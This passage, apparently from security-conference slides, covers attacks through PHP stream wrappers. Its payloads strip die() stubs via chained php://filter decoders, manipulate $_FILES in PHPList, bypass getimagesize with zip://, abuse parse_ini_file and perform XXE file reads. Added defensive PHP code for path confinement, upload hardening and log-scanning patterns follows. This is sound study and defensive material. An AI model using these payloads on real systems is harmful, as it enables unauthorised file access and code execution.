    You can delete some data by applying base64_decode several times.
    $content = "; <? die; ?>\n";
    $content .= "[/Ly8vVTFOQ1RXSXpXbXhKUmtKSlZVRTlQUT09]\n";
    $file = 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=./PoC';
    file_put_contents($file, $content);
    "Stub": /Ly8v ( base64_decode('Ly8v') == '///' )
    The convert.base64-decode filter does not handle strings with an equal sign in the middle.
    $s = 'php://filter/read=convert.base64-decode/resource=data:,dGVzdA==CRAP';
    var_dump(file_get_contents($s)); // print: string(0) ""
  • 18. Filter string.strip_tags
    The string.strip_tags filter speeds up the "extrusion" process
    $content = "; <? die; ?>\n";
    $content .= "=3C=3Fprint('PHP');\n";
    $file = 'php://filter/write=string.strip_tags|convert.quoted-printable-decode/resource=./PoC';
    $quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); // =3C
    file_put_contents($file, $content);
    The convert.quoted-printable-decode filter handles strings symbol by symbol.
    Characters in Quoted-Printable format (RFC 2045, section 6.7) are converted into characters of an 8-bit code page.
    Conversion into Quoted-Printable format:
    $quoted_printable_lt = '='.strtoupper(dechex(ord('<')));
    The convert.quoted-printable-decode filter fails if the string contains an equal sign that is not followed by a hexadecimal character code.
    $s = 'php://filter/read=convert.quoted-printable-decode/resource=data:,dGVz=CRAP';
    var_dump(file_get_contents($s)); // print: string(0) ""
  • 19. TextPattern: Upload Arbitrary Files (I)
    A file with a .php extension stores information about the comments' authors.
    $file = $prefs['tempdir'].DS.'evaluator_trace.php';
    if (!file_exists($file))
    {
      $fp = fopen($file, 'wb');
      if ($fp)
        fwrite($fp, "<?php return; ?>\n".
          "This trace-file tracks saved comments. (created ".
          safe_strftime($prefs['archive_dateformat'], time()).")\n".
          "Format is: Type; Probability; Message ".
          "(Type can be -1 => spam, 0 => moderate, 1 => visible)\n\n");
  • 21. Partial File Reading in PHPList <= 2.10.13 (I)
    The reason is the possibility of modifying the structure of the $_FILES array
    http://isisblogs.poly.edu/2011/08/11/php-not-properly-checking-params/
    if (is_array($_FILES)) { ## only avatars are files
      foreach ($_FILES['attribute']['name'] as $key => $val) {
        if (!empty($_FILES['attribute']['name'][$key])) {
          $tmpnam = $_FILES['attribute']['tmp_name'][$key];
          $size = $_FILES['attribute']['size'][$key];
          if ($size < MAX_AVATAR_SIZE) {
            $avatar = file_get_contents($tmpnam);
            Sql_Query(sprintf('replace into %s (userid,attributeid,value) values(%d,%d,"%s")', $tables["user_attribute"], $id, $key, base64_encode($avatar)));
    The following HTML form allows an attacker to upload files into the database.
    <form action="http://localhost/lists/admin/?page=user&id=1" method="POST" enctype="multipart/form-data">
      <input type="file" name="attribute[tmp_name][">
      <input type="file" name="attribute[size][">
      <input type="file" name="attribute[[tmp_name]">
      <input type="file" name="attribute[name][">
      <input name="change" value="Save Changes" type="submit">
    </form>
  • 22. Partial File Reading in PHPList <= 2.10.13 (II)
  • 23. getimagesize check bypass (I)
    With filters, you can not only delete stoppers but also modify images that are checked with the getimagesize function. If you manage to inject data into EXIF image
  • 24. getimagesize check bypass (II)
    extract($_REQUEST);
    .....
    include $templatedir.'/header.html';
    .....
    if (!empty($_FILES))
    {
      $file_info = getimagesize($_FILES['image']['tmp_name']);
      if ($file_info['mime'] == 'image/jpeg')
      {
        if (move_uploaded_file($_FILES['image']['tmp_name'], $folder.'/avatar.jpg'))
          ......
    Load an image, but a zip archive containing the /my/header.html file is stored on the server.
    folder=php://filter/write=string.strip_tags|convert.base64-decode/resource=/tmp/
    Include the file from the zip archive
    templatedir=zip:///tmp/avatar.jpg#/my
  • 25. Files with arbitrary content
    If you manage to create a file with arbitrary content, you can:
    create a session file and exploit an unserialize bug via session_start();
    create a zip archive and exploit RFI;
    create/rewrite .htaccess/.htpasswd files;
    create or rewrite templates.
  • 26. parse_ini_file attack
    The parse_ini_file function handles local files only.
    session_start();
    $_SESSION['admin'] = $_POST['name'];
    .......
    $var = parse_ini_file($inifile);
    require $var['require'];
    Create the session file /tmp/sess_dffdsdf24gssdgsd90
    admin|s:68:"Ly8vVnpOYWFHTnNNRXRqYlZaNFpGZHNlVnBVTUdsTU1sWXdXWGs1YjJJelRqQmplVWs5"
    With filters, transform the session file into a format suitable for the parse_ini_file function.
    php://filter/read=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/tmp/sess_dffdsdf24gssdgsd90
  • 27. XXE Attack
    Read files via XML Injection.
    <?xml version='1.0'?>
    <!DOCTYPE scan [
      <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=http://127.0.0.1/server-status">
    ]>
    <scan>&test;</scan>
    The simplexml_load_file function and the DOMDocument::load method support wrappers.
  • 28. Limitations for the usage of wrappers
    By default, you are not allowed to use wrappers in includes when Suhosin is installed (even if allow_url_include = On).
    For example, the zip:// wrapper becomes available as soon as the whitelist includes it:
    suhosin.executor.include.whitelist = "zip"
    The file_exists, is_file and filesize functions return FALSE when the php://filter, zip:// and data:// wrappers are used as file names.
  • 29. Thank you for your attention! Questions?
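Slides 6, 9, 10 and 11 show user input reaching include(), copy() and a regex check unchanged. The following is an added example, not code from the talk or from TimThumb: it confines a template path with realpath() and validates a remote image URL by scheme and host via parse_url() instead of a pattern match. The function names safe_local_path and safe_remote_image_url and the demo directory are assumptions.

```php
<?php
// Added example, not from the talk: confine user-supplied paths and URLs before they
// reach include(), copy() or file_get_contents(). Function names are assumed.

// Returns the canonical path of $userPath inside $baseDir, or null if it escapes,
// does not exist, or selects a stream wrapper (zip://, data:, php://filter, compress.zlib://).
function safe_local_path(string $baseDir, string $userPath): ?string
{
    // A NUL byte cuts off the '/header.html' suffix; a "scheme:" prefix selects a wrapper.
    if (strpos($userPath, "\0") !== false || preg_match('#^[a-z][a-z0-9+.\-]*:#i', $userPath)) {
        return null;
    }
    // realpath() resolves ../ and returns false for wrappers and for missing files.
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $userPath);
    if ($base === false || $real === false) {
        return null;
    }
    // Compare with a trailing separator so /base-evil is not accepted as inside /base.
    if (strncmp($real . '/', $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Validates a remote image URL: URL syntax, http(s) only, host on an allow-list.
// data:, compress.zlib: and php: strings satisfy parse_url() and the slide's regex,
// but not the scheme check. The caller still chooses the local file name itself.
function safe_remote_image_url(string $url, array $allowedHosts): ?string
{
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $p = parse_url($url);
    if (!is_array($p) || !isset($p['scheme'], $p['host'])) {
        return null;
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if (!in_array(strtolower($p['host']), $allowedHosts, true)) {
        return null;
    }
    return $url;
}

// Demo on constructed input: a throw-away template directory and the slides' payloads.
$base = sys_get_temp_dir() . '/tpl_demo';
@mkdir($base . '/default', 0700, true);
touch($base . '/default/header.html');
foreach (['default',                            // legitimate template name
          'zip:///tmp/any_name_zip_arxiv#/my',  // zip:// wrapper (slide 6)
          "../../etc/passwd\0",                 // NUL-byte truncation
          'default/../..'] as $p) {             // traversal out of the base directory
    var_dump(safe_local_path($base, $p));
}
$hosts = ['img.youtube.com'];
var_dump(safe_remote_image_url('http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg', $hosts));
var_dump(safe_remote_image_url('data://img.youtube.com/aaamy.php?;base64,SSBsb3ZlIFBIUAo', $hosts));
var_dump(safe_remote_image_url('compress.zlib://img.youtube.com/../path/to/local/file', $hosts));
```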
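Slides 21 and 24 depend on the shape of $_FILES, on getimagesize() alone, and on a request-supplied destination folder. The following is an added example, not the talk's or any project's code: an avatar handler that checks the $_FILES structure, uses is_uploaded_file() and finfo, re-encodes the image through GD so appended archive data or EXIF-embedded code is dropped, and writes to a server-chosen name in a fixed directory. The names AVATAR_DIR and handle_avatar_upload are assumptions; the GD extension is required.

```php
<?php
// Added example, not from the talk: avatar upload that does not trust the $_FILES
// structure, the client MIME type, getimagesize() alone, or a request-supplied folder.
// AVATAR_DIR and handle_avatar_upload() are assumed names; the GD extension is required.

const AVATAR_DIR = '/var/www/app/avatars';   // fixed by the server, never by the request

// Returns the saved path, or null when the upload is rejected.
function handle_avatar_upload(array $files, string $destDir): ?string
{
    // 1. $_FILES['image'] must be the flat array PHP builds for one file. PHPList broke
    //    because attribute[tmp_name][ turned tmp_name into an attacker-shaped array.
    $f = $files['image'] ?? null;
    if (!is_array($f) || !is_string($f['tmp_name'] ?? null) || !is_int($f['error'] ?? null)) {
        return null;
    }
    // 2. is_uploaded_file() is true only for the temporary file PHP itself created.
    if ($f['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
        return null;
    }
    // 3. Sniff the magic bytes with finfo; ignore the client-supplied $f['type'].
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($f['tmp_name']) !== 'image/jpeg') {
        return null;
    }
    // 4. Re-encode through GD. Only the decoded pixels are written back, so a zip archive
    //    appended to the JPEG or code placed in EXIF/comment segments does not survive.
    $img = @imagecreatefromjpeg($f['tmp_name']);
    if ($img === false) {
        return null;
    }
    // 5. Destination = fixed directory + server-generated name, so php://filter/write=
    //    or zip:// can never enter the target path through a variable such as $folder.
    $dest = rtrim($destDir, '/') . '/' . bin2hex(random_bytes(8)) . '.jpg';
    $ok = imagejpeg($img, $dest, 85);
    imagedestroy($img);
    return $ok ? $dest : null;
}

// Usage inside the upload route (the route itself is assumed):
// $saved = handle_avatar_upload($_FILES, AVATAR_DIR);
// if ($saved === null) { http_response_code(400); exit('upload rejected'); }
```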
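Nearly every payload in the talk shares one marker: a stream wrapper scheme inside a request parameter. The following is an added example, not from the talk: it scans combined-format access-log lines for wrapper schemes after double URL-decoding the request target. The function name find_wrapper_requests and the log lines are constructed for the demo.

```php
<?php
// Added example, not from the talk: flag web requests whose parameters carry a PHP stream
// wrapper. find_wrapper_requests() is an assumed name; the log lines below are constructed.

// Wrapper schemes used throughout the talk. The lookbehind keeps "index.php:" from matching.
const WRAPPER_RE = '#(?<![\w.-])(?:(?:php|zip|compress\.zlib|compress\.bzip2|expect|phar|glob|ftp)://|data:)#i';

// Returns one entry per suspicious line: line number, matched scheme, decoded target.
function find_wrapper_requests(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        // Combined log format: ... "GET /path?query HTTP/1.1" status bytes
        if (!preg_match('#"(?:GET|POST|PUT) (\S+) HTTP/#', $line, $m)) {
            continue;
        }
        // Decode twice: "://" is often sent as %3A%2F%2F or double-encoded as %253A%252F%252F.
        $target = rawurldecode(rawurldecode($m[1]));
        if (preg_match(WRAPPER_RE, $target, $w)) {
            $hits[] = ['line' => $n + 1, 'scheme' => strtolower($w[0]), 'target' => $target];
        }
    }
    return $hits;
}

// Constructed sample lines (not real traffic). Query strings are visible here; POST bodies,
// which carry most of the talk's payloads, are absent from access logs and need request-body
// logging or a WAF in front of the application.
$log = [
    '10.0.0.5 - - [12/May/2012:10:01:02 +0400] "GET /index.php?path=default HTTP/1.1" 200 1024',
    '10.0.0.9 - - [12/May/2012:10:01:07 +0400] "GET /index.php?path=zip:///tmp/any_name_zip_arxiv%23/my HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/May/2012:10:01:09 +0400] "GET /timthumb.php?src=data://img.youtube.com/a.php?;base64,SSBsb3ZlIFBIUAo HTTP/1.1" 200 99',
    '10.0.0.9 - - [12/May/2012:10:01:11 +0400] "GET /timthumb.php?local_filepath=php%253A%252F%252Ffilter%252Fresource%253D.%252Fx.php HTTP/1.1" 200 99',
    '10.0.0.7 - - [12/May/2012:10:01:13 +0400] "GET /hosts.php?f=compress.zlib://img.youtube.com/../etc/hosts HTTP/1.1" 200 70',
];
foreach (find_wrapper_requests($log) as $hit) {
    printf("line %d: %s in %s\n", $hit['line'], $hit['scheme'], $hit['target']);
}
```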